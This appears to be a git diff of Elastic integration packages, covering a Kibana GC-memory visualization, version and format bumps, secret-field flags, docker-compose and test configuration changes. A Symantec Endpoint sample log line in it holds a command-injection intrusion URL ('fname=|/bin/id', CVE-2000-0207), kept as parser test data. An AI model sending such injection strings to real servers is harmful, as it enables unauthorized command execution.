- "sourceField": "spring_boot.gc.last_info.memory_usage.after.ps_eden_space.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X4": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.after.ps_old_gen.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X5": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.after.ps_survivor_space.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.after.g1_eden_space.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X7": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.after.g1_old_gen.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X8": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "sum", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "spring_boot.gc.last_info.memory_usage.after.g1_survivor_space.used" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X9": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of After", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - { - "args": [ - "df8aa04a-8859-48a8-8624-e204eb09ad23X0", - "df8aa04a-8859-48a8-8624-e204eb09ad23X1" - ], - "name": "add", - "type": "function" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X2" - ], - "name": "add", - "type": "function" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X3" - ], - "name": "add", - "type": "function" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X4" - ], - "name": "add", - "type": "function" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X5" - ], - "name": "add", - "type": "function" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X6" - ], - "name": "add", - "type": "function" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X7" - ], - "name": "add", - "type": "function" - }, - "df8aa04a-8859-48a8-8624-e204eb09ad23X8" - ], - "location": { - "max": 615, - "min": 0 - }, - "name": "add", - "text": "sum(spring_boot.gc.last_info.memory_usage.after.code_cache.used)+sum(spring_boot.gc.last_info.memory_usage.after.compressed_class_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.metaspace.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_survivor_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_survivor_space.used)", - "type": "function" - } - }, - "references": [ - "df8aa04a-8859-48a8-8624-e204eb09ad23X0", - "df8aa04a-8859-48a8-8624-e204eb09ad23X1", - "df8aa04a-8859-48a8-8624-e204eb09ad23X2", - "df8aa04a-8859-48a8-8624-e204eb09ad23X3", - "df8aa04a-8859-48a8-8624-e204eb09ad23X4", - "df8aa04a-8859-48a8-8624-e204eb09ad23X5", - "df8aa04a-8859-48a8-8624-e204eb09ad23X6", - "df8aa04a-8859-48a8-8624-e204eb09ad23X7", - "df8aa04a-8859-48a8-8624-e204eb09ad23X8" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "8aabc9bc-b40b-4f3c-b077-c4d19cd6b477", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.gc" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.gc" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "df8aa04a-8859-48a8-8624-e204eb09ad23", - "79ffbc3e-e907-45d9-b727-6710ca8b19c7" - ], - "layerId": "e937f0c4-f880-4837-9315-69d043a3f6b1", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "94f7e582-69e9-4fe4-9111-75aaa6a3d470", - "xAccessor": "01e713a3-bda9-4e10-b460-988900367abf" - } - ], - "legend": { - "isVisible": true, - "legendSize": "xlarge", - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "GC Memory Usage" - } - }, - "title": "Memory usage after and before GC [Metrics Spring Boot]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-11-02T08:40:52.790Z", - "id": "spring_boot-fae00cb0-ca04-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "lens": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-e937f0c4-f880-4837-9315-69d043a3f6b1", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "8aabc9bc-b40b-4f3c-b077-c4d19cd6b477", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/spring_boot/manifest.yml b/packages/spring_boot/manifest.yml index e4e0db12119..c0641f41ec6 100644 --- a/packages/spring_boot/manifest.yml +++ b/packages/spring_boot/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: spring_boot title: Spring Boot -version: "1.2.1" +version: "1.4.0" description: This Elastic integration collects logs and metrics from Spring Boot integration. type: integration categories: @@ -9,7 +9,7 @@ categories: - java_observability conditions: kibana: - version: ^8.9.0 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -88,6 +88,7 @@ policy_templates: - name: password type: password title: Password + secret: true multi: false required: false show_user: false diff --git a/packages/squid/_dev/deploy/docker/docker-compose.yml b/packages/squid/_dev/deploy/docker/docker-compose.yml index b63005a03a3..7f5d4be570f 100644 --- a/packages/squid/_dev/deploy/docker/docker-compose.yml +++ b/packages/squid/_dev/deploy/docker/docker-compose.yml @@ -7,14 +7,12 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" squid-log-udp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9537 -p=udp /sample_logs/squid-log-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9537 -p=udp /sample_logs/squid-log-*.log squid-log-tcp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9537 -p=tcp /sample_logs/squid-log-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9537 -p=tcp /sample_logs/squid-log-*.log diff --git a/packages/statsd_input/_dev/test/system/test-default-config.yml b/packages/statsd_input/_dev/test/system/test-default-config.yml index e975ae16b8a..84a02f9e365 100644 --- a/packages/statsd_input/_dev/test/system/test-default-config.yml +++ b/packages/statsd_input/_dev/test/system/test-default-config.yml @@ -4,4 +4,4 @@ vars: listen_port: 8125 data_stream.dataset: statsd_input.statsd assert: - hit_count: 3 + hit_count: 6 diff --git a/packages/statsd_input/changelog.yml b/packages/statsd_input/changelog.yml index 554f94c71b6..d6e297103e1 100644 --- a/packages/statsd_input/changelog.yml +++ b/packages/statsd_input/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.3.0" + changes: + - description: Update to Kibana 8.11 to support enhanced statsd implementation, and fix system test cases. + type: enhancement + link: https://github.com/elastic/integrations/pull/9596 - version: "0.2.3" changes: - description: Improve documentation for the package. diff --git a/packages/statsd_input/manifest.yml b/packages/statsd_input/manifest.yml index 62e2f12ec9a..6f0b2257371 100644 --- a/packages/statsd_input/manifest.yml +++ b/packages/statsd_input/manifest.yml @@ -1,13 +1,13 @@ format_version: 2.0.0 name: statsd_input title: StatsD Input -version: "0.2.3" +version: "0.3.0" description: StatsD Input Package type: input categories: - observability conditions: - kibana.version: "^8.8.0" + kibana.version: "^8.11.0" elastic.subscription: "basic" icons: - src: /img/statsd.svg diff --git a/packages/statsd_input/sample_event.json b/packages/statsd_input/sample_event.json index a20820c4b3d..30c85427a9a 100644 --- a/packages/statsd_input/sample_event.json +++ b/packages/statsd_input/sample_event.json @@ -1,11 +1,11 @@ { - "@timestamp": "2023-06-19T05:20:48.498Z", + "@timestamp": "2024-04-15T14:06:01.418Z", "agent": { - "ephemeral_id": "19e6fd95-249c-4433-977e-5b1778a5d94e", - "id": "741b6193-4f1c-4fec-b58c-e038b4ca671b", + "ephemeral_id": "ee629c67-5780-4bfd-83c0-c89a032eba12", + "id": "b2bdd114-8042-4441-bd68-123aee9eca3b", "name": "docker-fleet-agent", "type": "metricbeat", - "version": "8.8.0" + "version": "8.11.0" }, "data_stream": { "dataset": "statsd_input.statsd", @@ -16,32 +16,32 @@ "version": "8.0.0" }, "elastic_agent": { - "id": "741b6193-4f1c-4fec-b58c-e038b4ca671b", + "id": "b2bdd114-8042-4441-bd68-123aee9eca3b", "snapshot": false, - "version": "8.8.0" + "version": "8.11.0" }, "event": { "agent_id_status": "verified", "dataset": "statsd_input.statsd", - "ingested": "2023-06-19T05:20:49Z", + "ingested": "2024-04-15T14:06:02Z", "module": "statsd" }, "host": { "architecture": "x86_64", "containerized": true, "hostname": "docker-fleet-agent", - "id": "e8978f2086c14e13b7a0af9ed0011d19", + "id": "d7fd92f5e61644938d48518adcee73ad", "ip": [ - "192.168.240.7" + "172.25.0.7" ], "mac": [ - "02-42-C0-A8-F0-07" + "02-42-AC-19-00-07" ], "name": "docker-fleet-agent", "os": { "codename": "focal", "family": "debian", - "kernel": "3.10.0-1160.88.1.el7.x86_64", + "kernel": "3.10.0-1160.102.1.el7.x86_64", "name": "Ubuntu", "platform": "ubuntu", "type": "linux", @@ -58,25 +58,6 @@ "statsd": { "python_counter": { "count": 4 - }, - "python_gauge_foo": { - "value": 10 - }, - "python_timer_total": { - "15m_rate": 0.2022160607980413, - "1m_rate": 0.2319822341482707, - "5m_rate": 0.206611418471353, - "count": 4, - "max": 0, - "mean": 0, - "mean_rate": 2.2908631551250593, - "median": 0, - "min": 0, - "p75": 0, - "p95": 0, - "p99": 0, - "p99_9": 0, - "stddev": 0 } } } \ No newline at end of file diff --git a/packages/suricata/changelog.yml b/packages/suricata/changelog.yml index b5f6bec995b..75d0ef875ca 100644 --- a/packages/suricata/changelog.yml +++ b/packages/suricata/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.21.0" + changes: + - description: Update package-spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "2.20.2" changes: - description: Changed owners diff --git a/packages/suricata/manifest.yml b/packages/suricata/manifest.yml index 1dfa728864d..3598a0acbf3 100644 --- a/packages/suricata/manifest.yml +++ b/packages/suricata/manifest.yml @@ -1,6 +1,6 @@ name: suricata title: Suricata -version: "2.20.2" +version: "2.21.0" description: Collect logs from Suricata with Elastic Agent. type: integration icons: @@ -8,7 +8,7 @@ icons: title: suricata size: 309x309 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.3" categories: [network, security, ids_ips] conditions: kibana: diff --git a/packages/symantec_edr_cloud/changelog.yml b/packages/symantec_edr_cloud/changelog.yml index f0d8a57e500..ad4bffb350a 100644 --- a/packages/symantec_edr_cloud/changelog.yml +++ b/packages/symantec_edr_cloud/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/symantec_edr_cloud/manifest.yml b/packages/symantec_edr_cloud/manifest.yml index b0388bdc91f..7c72366669f 100644 --- a/packages/symantec_edr_cloud/manifest.yml +++ b/packages/symantec_edr_cloud/manifest.yml @@ -1,7 +1,7 @@ -format_version: 3.0.0 +format_version: 3.0.2 name: symantec_edr_cloud title: Symantec EDR Cloud -version: "1.0.1" +version: "1.1.0" source: license: Elastic-2.0 description: Collect logs from Symantec EDR Cloud with Elastic Agent. @@ -10,7 +10,7 @@ categories: - security conditions: kibana: - version: ^8.10.1 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -46,6 +46,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: url type: text title: URL @@ -60,6 +61,7 @@ policy_templates: default: https://api.sep.securitycloud.symantec.com/v1/oauth2/tokens required: true show_user: false + secret: false - name: proxy_url type: text title: Proxy URL diff --git a/packages/symantec_endpoint/_dev/deploy/docker/sample_logs/symantec_endpoint.log b/packages/symantec_endpoint/_dev/deploy/docker/sample_logs/symantec_endpoint.log index 6ea679866c9..754e554ac81 100644 --- a/packages/symantec_endpoint/_dev/deploy/docker/sample_logs/symantec_endpoint.log +++ b/packages/symantec_endpoint/_dev/deploy/docker/sample_logs/symantec_endpoint.log @@ -24,4 +24,4 @@ Site: SEPSite,Server: exampleHostname,Symantec Endpoint Protection Manager could Site: SEPSite,Server: exampleHostname,Number of old risk events swept: 130 Site: SEPSite,Server: exampleHostname,LiveUpdate started. Site: SEPSite,Server: exampleHostname,Database maintenance started. -2020-01-16 08:00:31,Critical,serverName,Event Description: [SID: 20521] Web Attack: SGI InfoSearch fname Exec CVE-2000-0207 attack blocked. Traffic has been blocked for this application: C:\WINDOWS\SYSTEM32\INETSRV\W3WP.EXE,Local Host IP: 127.0.0.1,Local Host MAC: 000000000000,Remote Host Name: ,Remote Host IP: 127.0.0.1,Remote Host MAC: 000000000000,Outbound,TCP,Intrusion ID: 0,Begin: 2021-12-14 14:56:01,End: 2021-12-14 14:56:01,Occurrences: 1,Application: C:/WINDOWS/SYSTEM32/INETSRV/W3WP.EXE,Location: Default,User: someuser,Domain: DOMAIN,Local Port: 54301,Remote Port: 5112,CIDS Signature ID: 20521,CIDS Signature string: Web Attack: SGI InfoSearch fname Exec CVE-2000-0207,CIDS Signature SubID: 75437,Intrusion URL: www.example.com/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id,Intrusion Payload URL: ,SHA-256: ABCDEC4B72DB91F168C36C500C1BE9AE391C1FF09CD65295BB24267D35373FD9,MD-5: \ No newline at end of file +2020-01-16 08:00:31,Critical,serverName,Event Description: [SID: 20521] Web Attack: SGI InfoSearch fname Exec CVE-2000-0207 attack blocked. Traffic has been blocked for this application: C:\WINDOWS\SYSTEM32\INETSRV\W3WP.EXE,Local Host IP: 127.0.0.1,Local Host MAC: 000000000000,Remote Host Name: ,Remote Host IP: 127.0.0.1,Remote Host MAC: 000000000000,Outbound,TCP,Intrusion ID: 0,Begin: 2021-12-14 14:56:01,End: 2021-12-14 14:56:01,Occurrences: 1,Application: C:/WINDOWS/SYSTEM32/INETSRV/W3WP.EXE,Location: Default,User: someuser,Domain: DOMAIN,Local Port: 54301,Remote Port: 5112,CIDS Signature ID: 20521,CIDS Signature string: Web Attack: SGI InfoSearch fname Exec CVE-2000-0207,CIDS Signature SubID: 75437,Intrusion URL: www.example.com/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id,Intrusion Payload URL: ,SHA-256: ABCDEC4B72DB91F168C36C500C1BE9AE391C1FF09CD65295BB24267D35373FD9,MD-5: diff --git a/packages/symantec_endpoint/changelog.yml b/packages/symantec_endpoint/changelog.yml index 21f798e0bfc..459db0dc3f5 100644 --- a/packages/symantec_endpoint/changelog.yml +++ b/packages/symantec_endpoint/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.15.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9403 - version: "2.14.2" changes: - description: Changed owners diff --git a/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-logfile-config.yml b/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-logfile-config.yml index 0855ccf57fa..c06b2524491 100644 --- a/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-logfile-config.yml +++ b/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-logfile-config.yml @@ -5,3 +5,5 @@ data_stream: paths: - "{{SERVICE_LOGS_DIR}}/symantec_endpoint*.log" preserve_original_event: true +assert: + hit_count: 27 diff --git a/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-tcp-config.yml index 720efab0045..caeb3ab401f 100644 --- a/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-tcp-config.yml +++ b/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-tcp-config.yml @@ -6,3 +6,5 @@ data_stream: listen_address: 0.0.0.0 listen_port: 9514 preserve_original_event: true +assert: + hit_count: 27 diff --git a/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-udp-config.yml index bac96ec5b80..3be18610c0b 100644 --- a/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-udp-config.yml +++ b/packages/symantec_endpoint/data_stream/log/_dev/test/system/test-udp-config.yml @@ -6,3 +6,5 @@ data_stream: listen_address: 0.0.0.0 listen_port: 9514 preserve_original_event: true +assert: + hit_count: 27 diff --git a/packages/symantec_endpoint/manifest.yml b/packages/symantec_endpoint/manifest.yml index 5f093d7b691..0955664c4c3 100644 --- a/packages/symantec_endpoint/manifest.yml +++ b/packages/symantec_endpoint/manifest.yml @@ -1,9 +1,9 @@ name: symantec_endpoint title: Symantec Endpoint Protection -version: "2.14.2" +version: "2.15.0" description: Collect logs from Symantec Endpoint Protection with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: ["security", "edr_xdr"] conditions: kibana: diff --git a/packages/synthetics/changelog.yml b/packages/synthetics/changelog.yml index a38340ed534..c9ed5cfbcea 100644 --- a/packages/synthetics/changelog.yml +++ b/packages/synthetics/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Re-introduce pre-release changes from 1.2.0-rc1 + type: enhancement + link: https://github.com/elastic/integrations/pull/9058 +- version: "1.2.0-rc1" + changes: + - description: Adopt package spec v3 + type: enhancement + link: https://github.com/elastic/integrations/pull/8546 - version: "1.1.1" changes: - description: Fix meta container mapping diff --git a/packages/synthetics/data_stream/browser/fields/common.yml b/packages/synthetics/data_stream/browser/fields/common.yml index c3e4300c8bb..6608ccb762e 100644 --- a/packages/synthetics/data_stream/browser/fields/common.yml +++ b/packages/synthetics/data_stream/browser/fields/common.yml @@ -15,6 +15,7 @@ object_type: keyword description: > The meta fields allow you to add additional information to a monitor. + - name: monitor type: group description: > @@ -58,7 +59,6 @@ IP of service being monitored. If service is monitored by hostname, the `ip` field contains the resolved ip address for the current host. - name: status - required: true type: keyword description: > Indicator if monitor could validate the service to be available. diff --git a/packages/synthetics/data_stream/browser/fields/ecs.yml b/packages/synthetics/data_stream/browser/fields/ecs.yml index c2d2b7940fb..55779a51123 100644 --- a/packages/synthetics/data_stream/browser/fields/ecs.yml +++ b/packages/synthetics/data_stream/browser/fields/ecs.yml @@ -168,6 +168,7 @@ - name: answers level: extended type: object + object_type: keyword description: "An array containing an object for each answer section returned by the server.\nThe main keys that should be present in these objects are defined by ECS. Records that have more information may contain more keys than what ECS defines.\nNot all DNS data sources give all details about DNS answers. At minimum, answer objects must contain the `data` key. If more information is available, map as much of it to ECS as possible, and add any additional fields to the answer objects as custom fields." - name: answers.class level: extended @@ -285,7 +286,6 @@ fields: - name: version level: core - required: true type: keyword ignore_above: 1024 description: "ECS version this event conforms to. `ecs.version` is a required field and must exist in all events.\nWhen querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events." diff --git a/packages/synthetics/data_stream/browser/fields/http.yml b/packages/synthetics/data_stream/browser/fields/http.yml index 40dd8b42ee9..b113de142eb 100644 --- a/packages/synthetics/data_stream/browser/fields/http.yml +++ b/packages/synthetics/data_stream/browser/fields/http.yml @@ -22,6 +22,7 @@ - name: headers.* type: object + object_type: keyword enabled: false description: > The canonical headers of the monitored HTTP response. diff --git a/packages/synthetics/data_stream/browser/fields/summary.yml b/packages/synthetics/data_stream/browser/fields/summary.yml index 8ee50da76cd..7ca8314dcb2 100644 --- a/packages/synthetics/data_stream/browser/fields/summary.yml +++ b/packages/synthetics/data_stream/browser/fields/summary.yml @@ -11,24 +11,27 @@ type: integer description: > The number of endpoints that failed + - name: status type: keyword description: > The status of this check as a whole. Either up or down. + - name: attempt type: short description: > When performing a check this number is 1 for the first check, and increments in the event of a retry. + - name: max_attempts type: short description: > The maximum number of checks that may be performed. Note, the actual number may be smaller. + - name: final_attempt type: boolean description: > True if no further checks will be performed in this retry group. + - name: retry_group type: keyword - description: > - A unique token used to group checks across attempts. - + description: "A unique token used to group checks across attempts. \n" diff --git a/packages/synthetics/data_stream/browser/fields/synthetics.yml b/packages/synthetics/data_stream/browser/fields/synthetics.yml index 1e31bd01d91..3031f112f4c 100644 --- a/packages/synthetics/data_stream/browser/fields/synthetics.yml +++ b/packages/synthetics/data_stream/browser/fields/synthetics.yml @@ -14,6 +14,7 @@ Indexed used for creating total order of all events in this invocation. - name: payload + object_type: keyword type: object enabled: false - name: blob diff --git a/packages/synthetics/data_stream/browser/lifecycle.yml b/packages/synthetics/data_stream/browser/lifecycle.yml new file mode 100644 index 00000000000..d00bd25910f --- /dev/null +++ b/packages/synthetics/data_stream/browser/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "365d" diff --git a/packages/synthetics/data_stream/browser/manifest.yml b/packages/synthetics/data_stream/browser/manifest.yml index 2467326c39d..5ec704e9e72 100644 --- a/packages/synthetics/data_stream/browser/manifest.yml +++ b/packages/synthetics/data_stream/browser/manifest.yml @@ -9,10 +9,12 @@ elasticsearch: settings: index: codec: best_compression - sort.field: - - "url.full.keyword" - - "monitor.id" - privileges.indices: [auto_configure, create_doc, read] + sort: + field: + - "url.full.keyword" + - "monitor.id" + privileges: + indices: [auto_configure, create_doc, read] streams: - input: synthetics/browser title: Synthetic monitor check @@ -52,7 +54,7 @@ streams: multi: false required: true show_user: true - default: "\"@every 3m\"" + default: '"@every 3m"' - name: service.name type: text title: APM Service Name @@ -171,4 +173,4 @@ streams: multi: false required: false show_user: true - default: 2 \ No newline at end of file + default: 2 diff --git a/packages/synthetics/data_stream/browser_network/fields/common.yml b/packages/synthetics/data_stream/browser_network/fields/common.yml index 8d7b1605f00..841230154ce 100644 --- a/packages/synthetics/data_stream/browser_network/fields/common.yml +++ b/packages/synthetics/data_stream/browser_network/fields/common.yml @@ -15,6 +15,7 @@ object_type: keyword description: > The meta fields allow you to add additional information to a monitor. + - name: monitor type: group description: > @@ -58,7 +59,6 @@ IP of service being monitored. If service is monitored by hostname, the `ip` field contains the resolved ip address for the current host. - name: status - required: true type: keyword description: > Indicator if monitor could validate the service to be available. diff --git a/packages/synthetics/data_stream/browser_network/fields/ecs.yml b/packages/synthetics/data_stream/browser_network/fields/ecs.yml index c2d2b7940fb..55779a51123 100644 --- a/packages/synthetics/data_stream/browser_network/fields/ecs.yml +++ b/packages/synthetics/data_stream/browser_network/fields/ecs.yml @@ -168,6 +168,7 @@ - name: answers level: extended type: object + object_type: keyword description: "An array containing an object for each answer section returned by the server.\nThe main keys that should be present in these objects are defined by ECS. Records that have more information may contain more keys than what ECS defines.\nNot all DNS data sources give all details about DNS answers. At minimum, answer objects must contain the `data` key. If more information is available, map as much of it to ECS as possible, and add any additional fields to the answer objects as custom fields." - name: answers.class level: extended @@ -285,7 +286,6 @@ fields: - name: version level: core - required: true type: keyword ignore_above: 1024 description: "ECS version this event conforms to. `ecs.version` is a required field and must exist in all events.\nWhen querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events." diff --git a/packages/synthetics/data_stream/browser_network/fields/http.yml b/packages/synthetics/data_stream/browser_network/fields/http.yml index 51b5c0166d0..1c5904cda05 100644 --- a/packages/synthetics/data_stream/browser_network/fields/http.yml +++ b/packages/synthetics/data_stream/browser_network/fields/http.yml @@ -38,6 +38,7 @@ - name: headers.* type: object + object_type: keyword enabled: false description: > The canonical headers of the monitored HTTP response. diff --git a/packages/synthetics/data_stream/browser_network/fields/summary.yml b/packages/synthetics/data_stream/browser_network/fields/summary.yml index 18bf897ffad..ffecf3b7b5a 100644 --- a/packages/synthetics/data_stream/browser_network/fields/summary.yml +++ b/packages/synthetics/data_stream/browser_network/fields/summary.yml @@ -11,23 +11,27 @@ type: integer description: > The number of endpoints that failed + - name: status type: keyword description: > The status of this check as a whole. Either up or down. + - name: attempt type: short description: > When performing a check this number is 1 for the first check, and increments in the event of a retry. + - name: max_attempts type: short description: > The maximum number of checks that may be performed. Note, the actual number may be smaller. + - name: final_attempt type: boolean description: > True if no further checks will be performed in this retry group. + - name: retry_group type: keyword - description: > - A unique token used to group checks across attempts. + description: "A unique token used to group checks across attempts. \n" diff --git a/packages/synthetics/data_stream/browser_network/fields/synthetics.yml b/packages/synthetics/data_stream/browser_network/fields/synthetics.yml index c3520935d3f..2ae4f0618fc 100644 --- a/packages/synthetics/data_stream/browser_network/fields/synthetics.yml +++ b/packages/synthetics/data_stream/browser_network/fields/synthetics.yml @@ -15,6 +15,7 @@ - name: payload type: object + object_type: text enabled: false - name: blob type: binary diff --git a/packages/synthetics/data_stream/browser_network/lifecycle.yml b/packages/synthetics/data_stream/browser_network/lifecycle.yml new file mode 100644 index 00000000000..655b101047b --- /dev/null +++ b/packages/synthetics/data_stream/browser_network/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "14d" diff --git a/packages/synthetics/data_stream/browser_network/manifest.yml b/packages/synthetics/data_stream/browser_network/manifest.yml index 38a4efa8866..ddfaea9f46e 100644 --- a/packages/synthetics/data_stream/browser_network/manifest.yml +++ b/packages/synthetics/data_stream/browser_network/manifest.yml @@ -9,12 +9,14 @@ elasticsearch: settings: index: codec: best_compression - sort.field: - - "url.full.keyword" - - "http.request.url.keyword" - - "http.response.headers.etag" - - "monitor.id" - privileges.indices: [auto_configure, create_doc, read] + sort: + field: + - "url.full.keyword" + - "http.request.url.keyword" + - "http.response.headers.etag" + - "monitor.id" + privileges: + indices: [auto_configure, create_doc, read] streams: - input: synthetics/browser title: Synthetics monitors network information diff --git a/packages/synthetics/data_stream/browser_screenshot/fields/common.yml b/packages/synthetics/data_stream/browser_screenshot/fields/common.yml index 8d7b1605f00..841230154ce 100644 --- a/packages/synthetics/data_stream/browser_screenshot/fields/common.yml +++ b/packages/synthetics/data_stream/browser_screenshot/fields/common.yml @@ -15,6 +15,7 @@ object_type: keyword description: > The meta fields allow you to add additional information to a monitor. + - name: monitor type: group description: > @@ -58,7 +59,6 @@ IP of service being monitored. If service is monitored by hostname, the `ip` field contains the resolved ip address for the current host. - name: status - required: true type: keyword description: > Indicator if monitor could validate the service to be available. diff --git a/packages/synthetics/data_stream/browser_screenshot/fields/ecs.yml b/packages/synthetics/data_stream/browser_screenshot/fields/ecs.yml index 707899664a1..1b87e7fa554 100644 --- a/packages/synthetics/data_stream/browser_screenshot/fields/ecs.yml +++ b/packages/synthetics/data_stream/browser_screenshot/fields/ecs.yml @@ -168,6 +168,7 @@ - name: answers level: extended type: object + object_type: keyword description: "An array containing an object for each answer section returned by the server.\nThe main keys that should be present in these objects are defined by ECS. Records that have more information may contain more keys than what ECS defines.\nNot all DNS data sources give all details about DNS answers. At minimum, answer objects must contain the `data` key. If more information is available, map as much of it to ECS as possible, and add any additional fields to the answer objects as custom fields." - name: answers.class level: extended @@ -285,7 +286,6 @@ fields: - name: version level: core - required: true type: keyword ignore_above: 1024 description: "ECS version this event conforms to. `ecs.version` is a required field and must exist in all events.\nWhen querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events." diff --git a/packages/synthetics/data_stream/browser_screenshot/fields/summary.yml b/packages/synthetics/data_stream/browser_screenshot/fields/summary.yml index 34bb24ac038..a35396da23c 100644 --- a/packages/synthetics/data_stream/browser_screenshot/fields/summary.yml +++ b/packages/synthetics/data_stream/browser_screenshot/fields/summary.yml @@ -16,19 +16,23 @@ type: keyword description: > The status of this check as a whole. Either up or down. + - name: attempt type: short description: > When performing a check this number is 1 for the first check, and increments in the event of a retry. + - name: max_attempts type: short description: > The maximum number of checks that may be performed. Note, the actual number may be smaller. + - name: final_attempt 